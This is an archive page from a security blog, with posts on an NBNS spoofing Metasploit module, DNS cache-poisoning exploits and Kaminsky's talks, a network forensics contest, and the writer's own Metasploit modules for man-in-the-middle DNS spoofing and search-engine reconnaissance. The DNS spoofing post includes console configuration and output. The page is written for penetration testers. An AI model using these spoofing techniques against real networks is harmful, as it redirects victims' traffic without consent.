NBNS Spoofing in Metasploit

 exploitation, links, network, pentesting, vulnerabilities  5 Responses »
Mar 312011
 

Tim Medin, over at the excellent Packetstan blog, just wrote up an excellent post detailing the implementation of a NBNS spoofing module which has been added to the the latest Metasploit trunk:

This module is based off an old tool, nbnspoof.py, that I wrote to perform this attack, originally described (as nearly as I can tell) by Sumit Siddharth. It’s a very simple attack, taking advantage of the way Windows proceeds to NetBIOS Name Service lookups once local and DNS lookups fail. If you’ve ever turned a careful eye to broadcast traffic on any network with Windows systems, you’ve probably noticed that a surprising number of lookups fail through to NBNS for various reasons.

Tim does a great job of describing how the spoofing works, how to use it in the context of a penetration test, and how the module was developed. Due to its integration into the current version of the Metasploit framework, I’d have to say that I recommend it over the original python version. Maybe one day soon I’ll one-up him and try to turn it into a meterpreter post-exploitation script, in order to hijack remote hosts into being spoofers ;-) .

Until then, and in related news, I’ve submitted a talk on some other forms of Metasploit sorcery that I have developed recently to Defcon (and tomorrow to Blackhat once the CFP opens). With any luck I’ll be speaking at one or the other later this year. Either way, I’ll see some of my readers there, hopefully!

 Posted by wesley at 6:52 pm

Network Forensics Puzzle #3 Finalist!

 forensics, network  4 Responses »
Mar 042010
 

Today, results were posted for Sherri Davidoff and Jonathan Ham’s third network forensics puzzle contest. The puzzles, hosted at forensicscontest.com, are meant to encourage the development of network forensic tools that might be integrated into SANS training and toolkits. Puzzle #3 involved pulling information from an Apple TV device’s network traffic.

I participated in this contest and wrote a small Python script that generates a .CSV summary of Apple TV activity on a network and extracts .plist files from that traffic. It was a lot of fun to tinker around with, and it looks like I just managed to land in the list of finalists. You can check out the finalist entries, including mine, at the following links:

These competitions are fun to participate in, and I’m hoping that I’ll have time to finish up my entry for Puzzle #4 before the deadline.

 Posted by wesley at 8:43 am

Using SkyGrabber to Hack Unmanned Drones?

 network  16 Responses »
Dec 172009
 

There has been a lot of speculation today surrounding this Wall Street Journal article:

According to this article, the insurgents were able to capture drone video feeds using software like SkyGrabber.  SkyGrabber is, according to its website, essentially a sniffer for satellite Internet connections that can recognize and extract.  This works because the data stream from the satellite to the clients on the ground is undirected.

This article has fueled a lot of discussion along the lines of “Why aren’t drone feeds encrypted?”.  There are plenty of people writing about that question, so I’m going to take it in another direction:

“What if we (including the WSJ) are missing something here?”

What if the videos found on insurgent laptops were not direct data streams from the drones themselves?  What if they were actually captured as files being shuffled from one place to another over a satellite Internet connection, after they had been recorded and saved?

Now, I haven’t used SkyGrabber, so I would like some feedback from someone who has used it on this, but there are some things that don’t really make sense to me yet about this.  Looking at the feature list for SkyGrabber and (especially) the screenshots, I see progress bars for the downloads.  A progress bar indicates that you know when the file you’re downloading will end.  That indicates, to me at least, that SkyGrabber gets most of its data from protocols like HTTP (and P2P protocols as it states on the product pages) that indicate the size and name of files that they are about to transmit.

How do you know when a live stream, such as one that a drone is transmitting, is going to end?  How likely is it that, if it does record live streams, SkyGrabber would be able to recognize whatever streaming format the drone uses?  Someone with some experience using SkyGrabber (or, more unlikely, unmanned drone communication protocols) might be able to chime in on this.

Now, if recordings are being shuffled around after a mission from location to location, then it would make sense for those to go over protocols that SkyGrabber might understand.  This would fit with the “U.S. officials” statement that there was no evidence that the flights could be controlled or interfered with.

Without any other evidence, it’s hard to take the WSJ article as the complete story.  There’s a lot of room for alternatives:

  • The feeds being intercepted may not be live
  • Software other than SkyGrabber might be used
  • Maybe the story’s right-on and the drone is communicating over well-understood and parse-able protocols

It’s even possible that, while these incidents could have involved interception of non-live data, that the drones do communicate unencrypted and the possibility exists (with better tools) to intercept their feeds.

It’s very hard to say, but there are some of my thoughts on the matter.

 Posted by wesley at 4:32 pm

Audio and video of Kaminsky's DNS talk now available

 network, vulnerabilities  3 Responses »
Aug 252008
 

The kind folks who run Black Hat have gone ahead and released the audio and video of Dan Kaminsky’s talk at Black Hat USA 2008, entitled “Black Ops 2008: It’s The End Of The Cache As We Know It”, or “64K Should Be Good Enough For Anyone”.  This is the talk where he discusses the DNS flaw that has been big news lately, and even if you’re already familiar with the details, Kaminsky is a very entertaining speaker.

Thanks to blackhat.com.

 Posted by wesley at 7:18 am

Dan Kaminksy's Blackhat USA 2008 slides are now available

 network, vulnerabilities  No Responses »
Aug 062008
 

Everything we knew, plus some really neat tricks.

 Posted by wesley at 2:46 pm

Man-in-the-middle Fake DNS for Metasploit

 exploitation, network, pentesting  11 Responses »
Aug 042008
 

On Episode 116 of PaulDotCom Security Weekly, Paul mentioned how it would be nice if one could have a little bit finer control over the behavior of Metasploit’s fake DNS server.  It seemed like an easy enough hack, so I’ve thrown this together.  I can see this being useful in some situations, and hopefully you will too.

Metasploit’s fakedns.rb is good at what it does, which is respond to any DNS query with a spoofed response pointing at a specific IP address.  This module, which I’ve decided to name “mitm_fakedns.rb”, is a dirty, filthy hack of fakedns.rb.  It’s not nearly as polished and thought-out as the web_search_scan.rb module I wrote and posted about a couple of days ago, but it is kinda neat anyway.

It’ll listen for DNS, and when it gets a request, it will go ahead and pass it on to a real DNS server that you can specify.  Once it gets the response from the real DNS server, it’ll modify that response to point to the IP addresses you specify if it matches one of a set of regexes you provide.  This allows you to be a little more “surgical” with whatever attack you have planned, by only spoofing domain names of-interest.

Let’s have a look at the “show info”:

HacBook:framework wesley$ sudo ./msfconsole
Password:

                                  _
                                 | |      o
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|
                           \|

       =[ msf v3.2-release
+ -- --=[ 299 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
       =[ 68 aux

msf > use auxiliary/server/mitm_fakedns
msf auxiliary(mitm_fakedns) > info

       Name: MITM DNS Service
    Version: 5540

Provided by:
  unknown <ddz>
  hdm <hdm@metasploit.com>
  Wesley McGrew <wesley@mcgrewsecurity.com>

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME                   yes       File of ip,regex for filtering responses
  REALDNS                    yes       Ask this server for answers
  SRVHOST   0.0.0.0          yes       The local host to listen on.
  SRVPORT   53               yes       The local port to listen on.

Description:
  This hack of the metasploit fakedns.rb serves as a sort of MITM DNS
  server. Requests are passed through to a real DNS server, and the
  responses are modified before being returned to the client, if they
  match regular expressions set in FILENAME.

Once it's loaded, we can set our variables:

msf auxiliary(mitm_fakedns) > cat /Users/wesley/hosts.txt
[*] exec: cat /Users/wesley/hosts.txt

192.168.1.1,google.com
10.0.0.1,example.com
msf auxiliary(mitm_fakedns) > set FILENAME /Users/wesley/hosts.txt
FILENAME => /Users/wesley/hosts.txt
msf auxiliary(mitm_fakedns) > set REALDNS 192.168.1.254
REALDNS => 192.168.1.254
msf auxiliary(mitm_fakedns) > run
[*] Auxiliary module running as background job
msf auxiliary(mitm_fakedns) >

The file you specify should have an IP address and a regular expression, one pair per line.  Once it’s running, you can test it out by pointing “dig” at it:

HacBook:~ wesley$ dig @127.0.0.1 example.com

; <<>> DiG 9.4.1-P1 <<>> @127.0.0.1 example.com
; (1 server found)
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38312
;; flags: qr ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;example.com.			IN	A

;; ANSWER SECTION:
example.com.		99270	IN	A	10.0.0.1

;; Query time: 39 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Mon Aug  4 22:59:01 2008
;; MSG SIZE  rcvd: 45

This should serve as a pretty good drop-in replacement for fakedns.rb for some attacks.  Here’s the source:

 Posted by wesley at 10:30 pm

Web Search Scanner module for Metasploit

 network, recon, ruby, Uncategorized  3 Responses »
Aug 012008
 

The other day I decided that I wanted to become more familiar with the internals of the Metasploit Framework, so with the latest svn of the framework and a couple of books on Ruby, I started digging.  I decided a fun project would be to port some of my existing tools and scripts into the framework.  I have started this with this ground-up rework of GooSweep (which has fallen into disrepair), and I have to say: Putting this together in Ruby with the Metasploit framework was a very enjoyable experience, and resulted in something that’s useful and usable way beyond what GooSweep used to be.  I’m definitely going to be writing stuff in the framework more often, now.

This module, web_search_scan, will perform search engine queries (Google by default, but configurable) for each IP address (and, optionally, hostnames found by rDNS) in a range specified by the user.  If there are hits on the search engine for a host, the module will display the number of hits, and URLs to view the results.  If you have a database connected, it will also log notes to the database for each host that it finds.

It’s a simple idea, but I’ve found the technique to be very useful.  It requires a little manual work to check out the results, since there’s no way of really knowing what you’re going to find, but you can find some interesting things like this.  For example:

  • Publicly-accessible and indexed web logs and stats – You can tell if someone at that IP has visited a site, and possibly even when, how often, and what their user agent was
  • Wiki edits and IP user pages
  • Mailing list and newsgroup posts – Hits from the mail/post headers, or occasionally admins asking for configuration help that don’t censor addresses
  • Abuse reports for open proxies, spammers, etc.
  • Posts to forums, comments, or guestbooks that log and display IP addresses

With a little detective work, you can map out some known active hosts on a network, and some information about those hosts, without having to actively probe the network.  This is great for the information-gathering phase of a penetration test.  I’ve also found it to be very helpful for learning more about potential attackers when doing incident response.

Here’s what the module’s info looks like in Metasploit (output edited for width):

HacBook:framework wesley$ ./msfconsole

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|

       =[ msf v3.2-release
+ -- --=[ 299 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
       =[ 68 aux

msf > use auxiliary/scanner/misc/web_search_scan
msf auxiliary(web_search_scan) > info

       Name: Web Search Engine IP Address Scanner
    Version: 5612

Provided by:
  Wesley McGrew <wesley@mcgrewsecurity.com>

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  LOOKUP       false            yes       Reverse lookup IPs and
                                          search hostnames too? (Not
                                          stealthy)
  PROXYCHAINS                   no        Pipe-delimited (|) list of
                                          proxy chains to use
  QUIET        false            yes       Quiet output (still logs to
                                          db)
  RETRIES      3                yes       Number of times to retry
                                          queries if they fail
  RHOSTS                        yes       The target address range or
                                          CIDR identifier
  SLEEP        3                yes       Minimum time to sleep between
                                          requests (seconds)
  SLEEPRAND    3                yes       Random additional time to
                                          sleep (seconds)
  THREADS      1                yes       The number of concurrent threads

Description:
  This scanner will do a web search engine query for each IP address
  (optionally, rDNS names as well) and record the number of hits and a
  URL to the query results. This is a useful for determining some
  active hosts and information gathering about a network without
  having to directly probe the network. Common results include
  publicly accessible web access logs, mailing list posts, abuse
  reports, and wikipedia edits. (WARNING: If you set LOOKUP to true,
  your target may notice the reverse DNS lookups.)

msf auxiliary(web_search_scan) >

A quick overview of these options:

  • RHOSTS - Set of IP addresses you want to scan.  You can comma-delimit sets of hosts, do dash-seperated ranges, or masks, just like with any Metasploit module
  • LOOKUP - If you like, the module can do a reverse-DNS query for each IP address and perform search engine queries for each hostname found.  If you're trying hard to be stealthy, you may want to avoid this option, as the target's DNS will see the queries.
  • SLEEP and SLEEPRAND - After each search engine query, the module will sleep for SLEEP + rand(SLEEPRAND+1) seconds.  Many web search engines will freak out if you throw queries at it faster than a normal/human user would.  You can adjust this to be faster or slower, depending on how dangerous you feel.
  • RETRIES - Sometimes, even when we're careful, a search engine will respond with something we have no idea how to parse.  Or stops responding altogether.  This is the number of times the module will attempt a query before giving up.  At the end of a complete scan, the module will display all the queries that failed, so that you are aware of any false-negatives.
  • QUIET - If set to "true", the module will only output status at the beginning and end of its run.  If you set this, you will want to have a database connected, as that's the only place the results will be going.  You can set this, use "run -j" to execute the scan, and it will run in the background fairly quietly, letting you do other things in metasploit while this slowwww scan runs :) .
  • PROXYCHAINS and THREADS - Many metasploit modules allow you to specify a proxy chain to work with.  This one allows you to specify multiple chains, which will allow you parallelize and run a scan faster, even with all the necessary sleeping.  For best results, set THREADS to a few greater than the number of proxy chains.  Each thread will claim a proxy for duration of each individual query.  I apologize that this feature isn't extremely well tested (I left my botnet in my other pants).

There's also some "advanced" options, that allow you to tweak where and how the module gets its results.  This can be useful if you need to use a different search engine, or fix the current one if it's changes and breaks the regex.  Here's what you can tweak:

msf auxiliary(web_search_scan) > show advanced
Module advanced options:
   Name           : NOHITSREGEX
   Current Setting: (?:No results found)|(?:did not match any documents)
   Description    : Regex to match a zero-hit search
   Name           : NUMHITSREGEX
   Current Setting: of (?:about )?<b>((?:[,\d])+)<\/b> for <b>
   Description    : Regex to match number of hits
   Name           : SEARCHHOST
   Current Setting: www.google.com
   Description    : Hostname of search engine
   Name           : SEARCHPORT
   Current Setting: 80
   Description    : Search Port
   Name           : SEARCHURI
   Current Setting: /search?hl=en&q=*&btnG=Google+Search
   Description    : Search URI (* for query location)
   Name           : TIMEOUT
   Current Setting: 10
   Description    : Timeout for the search engine to respond
   Name           : USERAGENT
   Current Setting: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
   Description    : The User-Agent header to use for all requests

One thing you could do with the SEARCHURI option is add in extra parameters such as “site:example.com” to look for mentions IP addresses and hosts only on a specific site.

Here’s what a scan might look like (searching non-routable ranges guarantees some results, but it’s a bit pointless too :) ):

So there you have it!  Here’s the code, if you want to drop it in the framework (tested with the latest SVN of metasploit) and use it yourself:

 Posted by wesley at 7:29 pm

I'm calling it: the new cool-guy word is "Weaponize"

 exploitation, network  No Responses »
Jul 242008
 

…and I couldn’t be happier.  I’m going to start writing “weaponized code” instead of “exploits”.  This will totally make up for having to give up “reverse-engineering” for “deep analysis” for “legal reasons” ;) .

However you feel about people publishing exploits for the DNS flaw already, there’s a selection of them out there now, and you might as well have a look at the code if you’re a penetration tester.  Now, I’m going to give out some links to these, so if you happen to be a blackhat that relies only on this site for your exploit needs, I’m going to have to ask you to go ahead and close your browser:

  • I)ruid and H D Moore’s metasploit module (and in the context of the trunk version of metasploit) – This one’s pretty nice.  Like a good metasploit module, it has functionality built in to test a server for vulnerability.  It can’t spoof if there’s already a cached entry for the domain you’re trying to spoof, however it is smart enough to check for this ahead of time and sleep until it can try again.  This one also randomizes the domain names it’s using while it tries to guess the transaction ID.
  • Julien Desfossez’s standalone exploit – Less frills than the metasploit modules, but it gets points for being written in python with the excellent Scapy .  From the code, it looks like the domain names it’s using while guessing the transaction ID are pretty predictable:  a3.victim.com, a4.victim.com, a5.victim.com, etc. etc. etc.

I’ll talk about other exploits when I see them, if I think they’re interesting.  I’m honestly surprised it’s taken as long as it has for exploits to come out, as it’s a pretty easy vulnerability to wrap your head around, and pretty straightfoward to generate the packets.

This’ll give you something to play with in the lab whilethe Internet crumbles around you.

Edit:

This about sums up my thoughts:

I guarantee that |)ruid/hdm’s exploit was not the first. Who would you prefer poisons your cache: discreet pros or kiddies with metasploit?

Thanks Dino.

 Posted by wesley at 5:29 pm

Talking about DNS on the Securabyte 1 Podcast

 exploitation, network, vulnerabilities  1 Response »
Jul 222008
 

The folks who put on the excellent Securabit podcast have decided to put together a quick and dirty episode-between-episodes on the recent DNS vulnerability.  They’ve decided to call these spontaneous episodes “Securabytes”, and this is the first one:

Since Dan Kaminsky doesn’t leap around the apartment to find his headset in order to podcast on a 10 minute notice at 10PM, I was grabbed off IRC to discuss the details of the vulnerability and its impact.  I had a blast recording this episode with Rob, Joel, and Martin McKeay (of the great Network Security podcast and blog).  Being able to bounce it off these guys really helped to convey not only the vulnerability itself, but what it means for admins, end users, and even penetration testers.

I hope you give it a listen, and subscribe to Securabit in your iTunes or RSS!

 Posted by wesley at 1:18 pm

Black Ops: The Talks of Dan Kaminsky

 exploitation, network  2 Responses »
Jul 162008
 

Whenever a new sure-fire blockbuster movie sequel comes out, there’s always the attempt to wring some more cash out of the previous entries.  There’ll be a DVD box set that runs about $10 a disc, with all the previous films in one nice looking collection.  These sell well, both to people new to a series wanting to catch up, as well as long-time fans.

Dan Kaminsky’s talk at this year’s Black Hat USA conference on August 6th where he drops the new DNS 0-day will undoubtedly be the sure-fire blockbuster talk of the conference.  Kaminsky has given excellent talks on various network security topics for years now, so in the spirit of a cash-in box set, I’ve spent a little time today collecting up links to previous talks he’s given.

Most of these are in his recurring theme of “TCP/IP Black Ops”, and I have learned a lot over the years, listening to these talks.  The recent ones were fairly easy to find on Google Video, however some of the older ones required digging around a bit (mostly on the EasyNews mirror).  I’ve embedded or linked video, where available.  Some talks I could only find in mp3 format.  Some of the older Defcon talks may be available in realmedia video format on the defcon site, but I really prefer to stick to non-realmedia formats.

If you need slides to go along with the audio-only talks, it looks like most of them are available on Kaminsky’s bio page.

As I said, I’ve learned a lot from these talks, and highly recommend them to anyone else interested in getting elbows-deep into network security.  Enjoy!

If you’re handy with Gimp and create box art for a Dan Kaminsky box set, leave a comment ;-)

Defcon 9 (2001): Gateway Cryptography: Hacking Impossible Tunnels Through Improbable Networks with OpenSSH

Defcon 10 (2002): Black Ops of TCP/IP

Defcon 11 (2003): Stack Black Ops

Blackhat 2004: Black Ops of DNS

22C3: Black Ops Of TCP/IP 2005.5

Toorcon 2006 – Black Ops Of TCP-IP 2006

Shmoocon 2007 – Weaponizing Noam Chomsky (or Hacking with Pattern Languages)

Defcon 15 – Black Ops 2007: Design Reviewing The Web

 Posted by wesley at 1:22 pm
 Older Entries
© 2012 McGrew Security Suffusion theme by Sayontan Sinha